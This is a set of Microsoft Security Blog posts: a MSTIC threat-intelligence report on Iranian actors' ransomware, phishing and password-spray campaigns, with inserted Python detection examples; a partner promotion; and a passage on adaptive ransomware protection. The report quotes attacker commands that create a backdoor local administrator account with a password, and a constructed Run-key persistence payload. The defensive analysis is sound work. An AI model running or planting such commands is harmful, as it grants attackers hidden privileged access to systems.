MSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.

As with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

Three notable trends in Iranian nation-state operators have emerged:

  • They are increasingly utilizing ransomware to either collect funds or disrupt their targets.
  • They are more patient and persistent while engaging with their targets.
  • While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.

Ransomware

Since September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.

Timeline showing dates, threat actor, and malware payload of ransomware attacks by Iranian threat actors

Figure 1: Timeline of ransomware attacks by Iranian threat actors

In one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the DFIR Report describes a similar intrusion in which actors leveraged vulnerabilities in on-premises Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.

Scan

In the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to CVE-2018-13379. This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065).

Exploit

When they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named MicrosoftOutLookUpdater.exe. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.

Review

After gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were suitable for actions on objectives. On select victims, operators created local administrator accounts with a username of “help” and password of “_AS_@1394” via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.

net user help _AS_@1394 /add
net localgroup administrators help /add
net localgroup "Remote Desktop Users" help /add
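The Exploit and Review steps above leave two signals in process-creation telemetry that a defender can correlate: a PowerShell launch carrying a Base64-encoded command (the implant delivery), and a local account being created and then added to a privileged group on the same host. The following added example (not MSTIC’s tooling, and not code from the post) runs that logic over constructed events; the hostnames, the IIS worker-process heuristic and the severity labels are assumptions, while the “help” account and group names come from the commands shown above.

```python
"""Added example (not MSTIC's tooling): look for the persistence and
local-admin creation patterns from the Exploit and Review steps in
process-creation events. Events and hostnames are constructed."""
import base64
import re
from collections import defaultdict

# Flags under which PowerShell accepts a Base64 (UTF-16LE) encoded command
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
USER_ADD_RE = re.compile(r"\bnet1?\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)
GROUP_ADD_RE = re.compile(r'\bnet1?\s+localgroup\s+("[^"]+"|\S+)\s+(\S+)\s+/add\b', re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run", re.I)      # startup registry key
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}
WEB_WORKERS = {"w3wp.exe"}   # IIS worker process (Exchange runs in it); assumption: rate as high

# Decoded content of the constructed encoded command: a Run-key persistence write
DECODED_SAMPLE = (
    "Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
    "-Name Updater -Value C:\\placeholder\\loader.exe"
)
_ENCODED_SAMPLE = base64.b64encode(DECODED_SAMPLE.encode("utf-16-le")).decode("ascii")

# Constructed events: (host, parent process, command line)
SAMPLE_EVENTS = [
    ("ex-srv01", "w3wp.exe", "powershell.exe -nop -w hidden -enc " + _ENCODED_SAMPLE),
    ("ex-srv01", "cmd.exe", "net user help _AS_@1394 /add"),
    ("ex-srv01", "cmd.exe", "net localgroup administrators help /add"),
    ("ex-srv01", "cmd.exe", 'net localgroup "Remote Desktop Users" help /add'),
    ("ws-042", "explorer.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ("ws-042", "cmd.exe", "net user"),
]


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Emit findings; account creation and group addition are correlated per host."""
    findings = []
    created = defaultdict(set)   # host -> usernames created by 'net user ... /add'
    for host, parent, cmd in events:
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            findings.append({
                "host": host,
                "rule": "encoded-powershell",
                "severity": "high" if parent.lower() in WEB_WORKERS else "medium",
                "persistence_hint": bool(RUN_KEY_RE.search(decoded)),
                "decoded": decoded,
            })
        m = USER_ADD_RE.search(cmd)
        if m:
            created[host].add(m.group(1).lower())
        g = GROUP_ADD_RE.search(cmd)
        if g:
            group = g.group(1).strip('"').lower()
            user = g.group(2).lower()
            if group in PRIVILEGED_GROUPS and user in created[host]:
                findings.append({
                    "host": host,
                    "rule": "new-local-account-privileged",
                    "severity": "high",
                    "user": user,
                    "group": group,
                })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Decoding the command line before matching matters: a rule that only looks for the literal Run-key path would miss it inside the Base64 blob, and correlating the `net user` and `net localgroup` events per host separates an attacker’s account creation from routine administration that touches only one of the two.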

Stage and Ransom

Finally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.

Your drives are Encrypted! Contact us: Telegram: @badguy

Patience and persistence

MSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator’s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.

PHOSPHORUS – Patient and persistent

PHOSPHORUS sends “interview requests” to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.

Once the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.

MSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.

CURIUM – In it for the long run

CURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.

These attackers have followed the following playbook:

  • Masquerade as an attractive woman on social media
  • Establish a connection with a target user via social media such as LinkedIn or Facebook
  • Chat with the target daily
  • Send benign videos of the woman to the target to prime them to lower their guard
  • Send malicious files to the target similar to the benign files previously sent
  • Request that the target user open the malicious document
  • Exfiltrate data from the victim machine

The process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time through constant communication, which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.

By exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.

Brute force

In 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has blogged about DEV-0343 activity previously.

Analysis of Office 365 logs suggests that DEV-0343 is using a red team tool like o365spray to conduct these attacks.

Targeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.

As we discussed in our previous blog, DEV-0343 operators’ ‘pattern of life’ is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.

Bar chart showing activity per hour

Figure 2: DEV-0343 observed operating hours in UTC

Bar chart showing requests per day

Figure 3: DEV-0343 observed actor requests per day

Known DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.
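Two of the observations in this section translate directly into detection logic: a password spray shows up in Office 365 sign-in logs as one source touching many accounts with only a handful of failures each, and the “pattern of life” is simply a histogram of when a source is active in UTC. The following added example (not MSTIC’s tooling, and not code from the post) implements both over constructed sign-in records; the IP addresses, user agent, tenant name and thresholds are assumptions to be tuned per tenant, and grouping by source IP is a simplification since a real campaign may rotate addresses.

```python
"""Added example (not MSTIC's tooling): flag password-spray behaviour in
sign-in records and summarise when a source is active, in UTC. Records,
addresses and thresholds are constructed assumptions; tune them per tenant."""
from collections import Counter, defaultdict
from datetime import datetime, timezone

# Assumed thresholds: many distinct accounts, few tries each, from one source
SPRAY_MIN_USERS = 10
SPRAY_MAX_TRIES_PER_USER = 3
SPRAY_WINDOW_SECONDS = 3600


def _t(hour, minute):
    # Tuesday 2021-11-09, inside the Sun-Thu 04:00-16:00 UTC window from the post
    return datetime(2021, 11, 9, hour, minute, tzinfo=timezone.utc)


# Constructed records: (timestamp, user, source_ip, user_agent, success)
SAMPLE_SIGNINS = [
    (_t(5, i), "user%02d@contoso.example" % i, "203.0.113.7", "python-requests/2.26", False)
    for i in range(30)
] + [
    (_t(9, 1), "alice@contoso.example", "198.51.100.20", "Mozilla/5.0", False),
    (_t(9, 2), "alice@contoso.example", "198.51.100.20", "Mozilla/5.0", False),
    (_t(9, 3), "alice@contoso.example", "198.51.100.20", "Mozilla/5.0", True),
]


def detect_password_spray(signins):
    """One alert per source IP whose failed sign-ins, inside some window,
    touch many accounts with only a few attempts on each."""
    failures = defaultdict(list)
    for ts, user, ip, _ua, ok in signins:
        if not ok:
            failures[ip].append((ts, user))
    alerts = []
    for ip, fails in failures.items():
        fails.sort()
        best = None
        start = 0
        for end in range(len(fails)):
            # slide the window start forward until it fits SPRAY_WINDOW_SECONDS
            while (fails[end][0] - fails[start][0]).total_seconds() > SPRAY_WINDOW_SECONDS:
                start += 1
            per_user = Counter(u for _, u in fails[start:end + 1])
            if (len(per_user) >= SPRAY_MIN_USERS
                    and max(per_user.values()) <= SPRAY_MAX_TRIES_PER_USER
                    and (best is None or len(per_user) > best["distinct_users"])):
                best = {
                    "source_ip": ip,
                    "distinct_users": len(per_user),
                    "failed_attempts": sum(per_user.values()),
                    "window_start": fails[start][0],
                    "window_end": fails[end][0],
                }
        if best:
            alerts.append(best)
    return alerts


def activity_profile(signins, ip):
    """Hour-of-day and weekday histograms (UTC) for one source: the
    'pattern of life' view the post describes."""
    hours, days = Counter(), Counter()
    for ts, _user, src, _ua, _ok in signins:
        if src == ip:
            utc = ts.astimezone(timezone.utc)
            hours[utc.hour] += 1
            days[utc.strftime("%a")] += 1
    return hours, days


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_SIGNINS):
        print(alert)
    print(activity_profile(SAMPLE_SIGNINS, "203.0.113.7"))
```

The per-user cap is what separates a spray from a conventional brute force: a user who mistypes a password twice and then succeeds never trips the rule, whereas thirty accounts each failing once from the same source does. In production the same grouping is usually applied to the user agent or ASN as well as the IP, and the hour and weekday histograms become meaningful only once enough days of activity have been collected.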

Closing thoughts: Increasingly capable threat actors

As Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:

  • Information operations
  • Disruption and destruction
  • Support to physical operations

Specifically, Iranian operators have proven themselves to be both willing and able to:

  • Deploy ransomware
  • Deploy disk wipers
  • Deploy mobile malware
  • Conduct phishing attacks
  • Conduct password spray attacks
  • Conduct mass exploitation attacks
  • Conduct supply chain attacks
  • Cloak C2 communications behind legitimate cloud services

MSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.


The post Evolving trends in Iranian threat actor activity – MSTIC presentation at CyberWarCon 2021 appeared first on Microsoft Security Blog.


How Open Systems uses Microsoft tools to improve security maturity

November 15th, 2021

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.

We’ve all seen it happen—an organization has all the top-notch security tools in place and still gets breached. In today’s rapidly evolving threat landscape, complexity leads to vulnerability. With so many tools to monitor, it’s easy for even the best security operations center (SOC) to get overwhelmed by non-actionable alerts1 and hampered by insufficient personnel to secure a growing digital estate. Research on “security tool sprawl” shows that, on average, organizations run 25 to 49 security tools from up to 10 different vendors.2 In a time of rising cyberattacks,3 the gaps left between mismatched or poorly implemented IT and security tools can make it impossible to establish a high-maturity security program.

Managed services to simplify security

Open Systems’ award-winning Managed Detection and Response (MDR) executes repeatable security missions that protect enterprises in real time and level up their security posture for tomorrow. The company’s customers are typically mid-market organizations—enterprise or small-to-medium corporations (SMC)—that are looking for all-day threat detection and response but also aspire to improve their security posture and resilience against attack. Open Systems noticed that many of these customers lean heavily on Microsoft for IT and cloud infrastructure and can unlock the value of these investments to consolidate and operationalize their security tools. Open Systems accomplishes this by providing a Microsoft Azure cloud-native Managed Detection and Response (MDR) service built for Microsoft Sentinel (formerly known as Microsoft Azure Sentinel), Microsoft Security best practices, and Microsoft 365 E5 (M365 E5).

As a six-time Gold Partner, Open Systems enables Microsoft customers to get more insights from their Microsoft Security tools and to better grasp their attack surface. The company’s use of Microsoft’s cloud-native security information and event management (SIEM) and security orchestration, automation, and response (SOAR) capabilities helps deliver stronger signal fidelity through machine learning threat modeling—delivering the actionable results Open Systems’ customers need to remain confident in their security every day. Even better, customers can often achieve this level of security using the Microsoft investments they’ve already made. And by integrating with Open Systems’ MDR, they get peace of mind by delegating detection and response to Microsoft-certified SOC analysts and threat hunters, helping contain threats early in the kill chain.

Open Systems’ MDR integration with Microsoft.

Figure 1: Open Systems’ MDR integration with Microsoft.

Open Systems’ approach

As a Microsoft Advanced Threat Protection Specialization certified partner, Open Systems focuses on three critical pillars for their MDR solution: mission-driven processes, a mission-ready platform, and Microsoft-certified experts.

Because the stakes are so high, the service is run like NASA Mission Control, using mission-driven processes to deliver repeatable and predictable outcomes that ensure fast detection and remediation of threats. These mission-driven processes have been honed for over 20 years with scientific rigor to bridge IT and security silos for optimal performance and resilience against attack. This allows Open Systems to deliver outcomes not alerts, greater business value, and out-of-this-world customer satisfaction.

Complementing these mature processes is the mission-ready platform at the heart of Open Systems’ services. This cloud-native platform weaves security into the fabric of an organization’s infrastructure, eliminating the need to stitch together multiple-point security products and the associated complexity. Managed from a “single pane of glass,” the platform also helps organizations realize the full value of their Microsoft infrastructure and that of their existing Microsoft security products.

The company’s four globally distributed SOCs follow the sun, with experts working from Europe, the United States, and Asia. Each of Open Systems’ DevSecOps engineers and security analysts has completed 400 hours of hands-on training and passed rigorous certification testing before servicing customers. They are armed with machine learning-powered, high-fidelity detection leveraging Microsoft Sentinel runbooks to ensure they can detect threats and make critical decisions quickly and accurately.

Leveraging Microsoft

Scalability and enabling customers to retain their data are key aspects of the MDR service, both of which are achieved with Microsoft Sentinel and Microsoft Azure Lighthouse. Open Systems engaged with Microsoft in the early days of Microsoft Sentinel, working with their product teams and early customers to create a solution that runs in the customer tenant. Microsoft Defender for Endpoint absorbs signals, then contains threats as part of the automated response. Open Systems also leverages Microsoft Sentinel’s SOAR capabilities by writing managed runbooks that automatically contain and shut down threats early.

The service uses Azure Lighthouse to operate things—run queries, integrate different log sources, and more. Credible threats are inspected by Open Systems’ engineers and co-managed as needed with the customer. In this way, Open Systems’ MDR service and Microsoft Security don’t just integrate, they feed off each other to deliver better results. As one of our customers put it:

“We’re experiencing exceptional support from Open Systems. They not only help us contain costs and manage Azure, but their engineers, adaptable SASE+ platform, and managed runbooks contain threats before they spread throughout the network,” said James Tsang, Systems Manager, College of Southern Nevada.

Managed security leads to $2.5 million in savings

A publicly traded clinical research organization came to Open Systems for help streamlining their security architecture. They wanted to move away from siloed third-party systems that created too much complexity, too many vulnerabilities, and drove up costs. They needed a cloud platform to provide the accessibility and service necessary to protect their offices worldwide and their hybrid and remote workers. Open Systems partnered with Microsoft and demonstrated how Microsoft 365 E5 and Microsoft Sentinel could work together to help improve the company’s compliance, data protection, and security posture.

The Open Systems team also identified opportunities to replace legacy monitoring tools with Microsoft Azure Monitor and consolidate compliance and security data onto Microsoft Azure Log Analytics, helping reduce the number of suppliers and reduce costs. Together with Microsoft, Open Systems performed a cloud readiness and economic assessment using the company’s real-world costs—learning that the Azure implementation would result in $2.5 million annual savings by eliminating existing applications and unnecessary data centers. Moreover, optimizing Microsoft 365 E5 eliminated the need for several of the company’s existing tools, resulting in additional annual savings of $400,000.

The Open Systems and Microsoft monitoring tools’ capabilities.

Figure 2: Azure Monitor.

MISA membership

Cybersecurity is a high-trust business: trust in technology, trust in services, and trust in the partnership you have with your security vendor. Most of Open Systems’ customers come to the company through word-of-mouth references; many customers have worked with the company for years. Open Systems joined the Microsoft Intelligent Security Association (MISA) in July 2020 as part of the managed security service providers (MSSP) pilot. Being a MISA member gives Open Systems customers confidence that the company can integrate its technologies with their existing Microsoft products, both on-premises and in the cloud. Customers want leadership and alignment with the Microsoft solutions they are investing in. Some of the company’s other ‘wow’ moments since joining MISA include:

As Mandana Javaheri, Global Director, Cybersecurity Solutions Group at Microsoft Corp put it in Open Systems’ press release, “MISA members are the cybersecurity industry leaders, unified by the common goal of helping secure our customers by offering their own valuable expertise and making the association more effective as it expands.”

Learn more

Want to learn more? Check out Open Systems’ Managed Detection and Response solution in the Azure Marketplace or visit the Open Systems’ Microsoft Solutions page.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.




The post How Open Systems uses Microsoft tools to improve security maturity appeared first on Microsoft Security Blog.

AI-driven adaptive protection against human-operated ransomware

November 15th, 2021

In human-operated ransomware attacks, threat actors use predictable methods to enter a device but eventually rely on hands-on-keyboard activities to move inside a network. To fortify our existing cloud-delivered automated protection against complex attacks like human-operated ransomware, we developed a cloud-based machine learning system that, when queried by a device, intelligently predicts if it is at risk, then automatically issues a more aggressive blocking verdict to protect the device, thwarting an attacker’s next steps.

The data-driven decisions the system makes are based on extensive research and experimentation to maximize blocking effectiveness without impacting customer experience. Since the adaptive protection is AI-driven, the risk score given to a device depends not only on individual indicators but on a broad swath of patterns and features that the system uses to determine whether an attack is imminent or underway. This capability is well suited to fighting human-operated ransomware because even if attackers use an unknown or benign file, or even a legitimate file or process, the system can help prevent that file or process from launching.

In a customer environment, the AI-driven adaptive protection feature was especially successful in helping prevent attackers from entering the network by stopping the binary that would have granted them access. By considering indicators that would otherwise be considered low priority for remediation, adaptive protection stopped the attack chain at an early stage, so that the overall impact of the attack was significantly reduced. The threat turned out to be Cridex, a banking trojan commonly used for credential theft and data exfiltration, which are also key components in many cyberattacks including human-operated ransomware.

Microsoft Defender for Endpoint customers who have enabled cloud protection are already getting the benefits of this improvement on their devices (servers excluded)—no additional step required. While cloud-delivered protection is turned on by default, we encourage customers to check and ensure that it remains on. This backend enhancement can help prevent human-operated attacks and other sophisticated threats from progressing inside a network and give incident responders more time to analyze and remediate attacks when they do happen. Microsoft will continue to use data science techniques to enrich and develop machine learning algorithms used in Microsoft 365 Defender.

Seeing adaptive protection in action

At Microsoft, our data scientists are constantly researching and prototyping advanced AI techniques to battle ransomware attackers. One feature that has proven to be effective against these attacks is the new AI-driven adaptive protection, recently released to our enterprise customers.

Figure 1. How the AI-driven adaptive protection works. Note that the device risk scoring is done in real time by design and thus does not cause any latency.

The adaptive protection feature works on top of the existing robust cloud protection, which defends against threats through different next-generation technologies. Compared to the existing cloud protection level feature, which relies on admins to manually adjust the cloud protection level, the adaptive protection is smarter and faster. It can, when queried by a device, automatically ramp the aggressiveness of cloud-delivered blocking verdicts up or down based on real-time machine learning predictions, thus proactively protecting the device.

We can see the AI-driven adaptive protection in action in a case where the system blocked a certain file. Before the occurrence of this file on the device, there were suspicious behaviors observed on the device such as system code injection and task scheduling. These signals, among others, were all taken into consideration by the AI-driven adaptive protection’s intelligent cloud classifiers, and when the device was predicted as “at risk,” the cloud blocking aggressiveness was instantly ramped up. Owing to the increased aggressiveness, Microsoft Defender Antivirus detected and blocked this file. It’s more difficult by nature to detect and block new malware at first sight, so without the adaptive cloud protection capability, this file might not have been blocked on this customer’s device.

Later the file was determined as a variant of Cridex, which is commonly used for credential theft and data exfiltration, leading to these credentials and data being used by cybercriminals in later attacks. These behaviors are also key components in human-operated ransomware attacks, where early detection is critical to prevent further impact. We elaborate more on how the adaptive cloud protection can protect customers from human-operated ransomware attacks in the next sections.

Using machine learning to power adaptive cloud protection

For this feature to perform as we intended, we needed it to do two things quite well. One, we needed the system to accurately determine whether a device is at risk. Two, the system then needed to respond and adjust depending on the previous judgment or score.

Predicting whether a device is at risk

As devices come under attack, activities on a device often start as a small number of suspicious indicators that would not, in isolation, typically be surfaced as a malicious attack. However, when these signals are seen in sequence over time or in a cluster pattern, AI-driven protection can assess the state of a device at the arrival time of each new signal and can immediately adjust the risk score of the device accordingly. Example signals include previous malware encounters, threats, behavior events, and other relevant information.

If a device is incorrectly scored as not at risk when it is in fact at risk, the attacker could perform additional activities that might be more difficult for detection technologies to catch, for instance if the attacker steals credentials and uses them to move laterally. Conversely, if a device is incorrectly determined as at risk when it is not, then the customer experience suffers. To strike a balance, we needed to find an intelligent machine learning model that can give an accurate score and test that model vigorously.

The model we chose is a binary classifier with pattern recognition (specifically, frequent itemset mining) integrated. A study has shown that the co-occurrence of signals, or a pattern, is a stronger discriminator for these purposes than individual tokens, and that using co-occurrence increases the overall robustness of the model. To this end, we included frequent patterns that commonly show up in the malicious samples as input features. To further increase the accuracy of the model (the number of correct classifications over total predictions), only discriminative patterns were selected: patterns with a small Jaccard distance to the frequent patterns present in the benign samples, that is, patterns that look much like routine benign activity, were excluded.

The risk score for the device as calculated by the model at that point in time then determines the system’s next steps.

Adjusting cloud blocking aggressiveness automatically

If the risk score of the given device exceeds a certain threshold, cloud protection automatically switches to aggressive blocking. This level of blocking means that some processes or files that would not immediately be considered malicious might also be blocked given that the device is at risk, and they are likely to have been used maliciously. Both the risk score threshold and the switch to aggressive mode are data-driven decisions based on intensive research and experiments to maximize blocking effectiveness without impacting customer experience.

Furthermore, since the risk of a device is scored and refreshed in real time, the cloud immediately ramps down the aggressiveness right after the device is deemed to be no longer at risk. Therefore, we can make sure that this AI-driven adaptive protection feature won’t cause unnecessary false positives or disrupt customer experience.
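As an added illustration of the two steps described above (scoring a device from co-occurring signals, then switching the blocking level on a threshold), here is a toy Python version that is not Microsoft's code: it mines frequent signal patterns from a few constructed malicious and benign samples, drops those that sit close (by Jaccard distance) to benign patterns, scores a device by the patterns it currently exhibits, and ramps blocking up and down on every query. All signal names, samples and thresholds are constructed.

```python
"""Toy pattern-based device risk scoring with adaptive blocking.
Added example, not Microsoft's model or data: the signal names, sample
devices, thresholds and scoring rule are all constructed for illustration."""
from itertools import combinations

# Constructed training data: each sample is the set of signal tokens seen on
# one device in a time window (the post's examples: code injection, task
# scheduling, network enumeration, credential access, ...).
MALICIOUS = [
    {"code_injection", "task_scheduling", "net_enum", "lsass_access"},
    {"code_injection", "task_scheduling", "net_enum", "new_service"},
    {"code_injection", "task_scheduling", "lsass_access"},
    {"task_scheduling", "net_enum", "lsass_access"},
]
BENIGN = [
    {"task_scheduling", "software_update"},
    {"task_scheduling", "net_enum", "software_update"},
    {"net_enum", "admin_console"},
    {"software_update"},
]

def frequent_itemsets(samples, min_support, max_size=3):
    """Brute-force frequent itemset mining (fine for a handful of tokens).
    Returns {frozenset(pattern): support} for each token combination present
    in at least `min_support` (a fraction) of the samples."""
    tokens = sorted(set().union(*samples))
    found = {}
    for size in range(1, max_size + 1):
        for combo in combinations(tokens, size):
            pattern = frozenset(combo)
            support = sum(pattern <= s for s in samples) / len(samples)
            if support >= min_support:
                found[pattern] = support
    return found

def jaccard_distance(a, b):
    return 1.0 - len(a & b) / len(a | b)

def discriminative_patterns(mal_patterns, ben_patterns, min_distance):
    """Drop malicious patterns that lie too close (small Jaccard distance) to
    a frequent benign pattern, i.e. that also describe routine activity.
    Individually benign tokens such as task scheduling therefore survive
    only as part of a co-occurrence pattern."""
    kept = {}
    for pattern, support in mal_patterns.items():
        nearest = min((jaccard_distance(pattern, b) for b in ben_patterns),
                      default=1.0)
        if nearest >= min_distance:
            kept[pattern] = support
    return kept

def build_patterns(min_support=0.5, min_distance=0.5):
    mal = frequent_itemsets(MALICIOUS, min_support)
    ben = frequent_itemsets(BENIGN, min_support)
    return discriminative_patterns(mal, ben, min_distance)

def risk_score(signals, patterns):
    """Score in [0, 1]: support-weighted share of the discriminative patterns
    that are fully present in the device's current signal set."""
    total = sum(patterns.values())
    hit = sum(sup for pat, sup in patterns.items() if pat <= signals)
    return hit / total if total else 0.0

class AdaptiveProtection:
    """Re-scores the device on every query and moves the blocking level in
    both directions, so aggressiveness ramps down as soon as the device is
    no longer at risk."""

    def __init__(self, patterns, threshold):
        self.patterns = patterns
        self.threshold = threshold  # constructed; tuned from data in practice
        self.mode = "normal"

    def rescore(self, device_signals):
        score = risk_score(device_signals, self.patterns)
        self.mode = "aggressive" if score >= self.threshold else "normal"
        return score

    def verdict(self, device_signals, file_reputation):
        """file_reputation is the cloud's own view of the queried file:
        'malicious', 'benign' or 'unknown' (first seen / low confidence)."""
        self.rescore(device_signals)
        if file_reputation == "malicious":
            return "block"
        if file_reputation == "unknown" and self.mode == "aggressive":
            return "block"  # the same file is allowed on a low-risk device
        return "allow"

def demo():
    """One device over time: routine activity, then code injection alongside
    task scheduling, then a clean window. Returns (verdict, mode) per step."""
    prot = AdaptiveProtection(build_patterns(), threshold=0.2)
    timeline = [
        ({"task_scheduling"}, "unknown"),
        ({"task_scheduling", "code_injection"}, "unknown"),
        ({"task_scheduling", "software_update"}, "unknown"),
    ]
    return [(prot.verdict(sig, rep), prot.mode) for sig, rep in timeline]
```

`demo()` returns `[('allow', 'normal'), ('block', 'aggressive'), ('allow', 'normal')]`: the unknown file is blocked only while the device exhibits the code-injection pattern, and blocking ramps back down once the signals clear.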

Delivering contextual and personalized protection

The responsiveness of the blocking mechanism to the real-time risk score computed in the cloud ensures that the system makes better-informed decisions, resulting in contextual, or stateful, blocking on devices. This level of protection customization means that the protection experience on each device is different, even for the same file or behavior.

For instance, process A can be allowed on a device that has a low risk score, but process A can be blocked and alerted on a potentially risky device. This “personalization” benefits customers because they are less likely to encounter false positives or false negatives, unlike with machine learning models trained on a dataset that is a mix of every device. Essentially, each device receives a level of protection that is tailored to it.

Adaptive cloud machine learning against human-operated ransomware

AI-driven adaptive protection has a wide range of use cases and tremendous potential value. Its application in human-operated ransomware prevention has been particularly successful. Human-operated ransomware attack chains usually follow specific patterns, starting with campaigns to distribute malicious files, then using techniques such as lateral movement for credential theft and data exfiltration, and finally deploying and activating ransomware payloads to encrypt files on the device and display a ransom note.

However, since threat actors react and adjust to specific findings in the environment, they are able to move fast and use a variety of alternatives to get to their next steps. This makes it challenging for incident responders to quickly determine whether an attack is underway and how to stop the attackers. Our adaptive protection, however, can pick up traces of attacker activity that occur before the actual encryption of files. These data are all collected by our machine learning algorithm and used as evidence to evaluate risk. When the system determines that the current device is compromised or at risk, aggressive cloud blocking kicks in instantly.

Detecting and blocking abuse of legitimate processes or files

In the hands-on-keyboard phase of human-operated ransomware attacks, attackers often use legitimate processes or files for their succeeding steps. For example, network enumeration is a benign behavior by nature, but when it is observed on a device that is determined to be compromised, the likelihood that attackers are performing reconnaissance activities and identifying targets is greater. Adaptive protection can intelligently block network enumeration behavior on risky devices to stop the attack chain and prevent further attacks.

Detecting and blocking ransomware loaders

Ransomware loaders refer to a set of tools or commodity malware that are usually used in the initial and intermediate stages of a ransomware attack. For example, Ryuk is delivered through banking trojan infections like Trickbot. If Trickbot infections go undetected, attackers may be able to move laterally and gain privilege on critical accounts, leading to destructive outcomes.

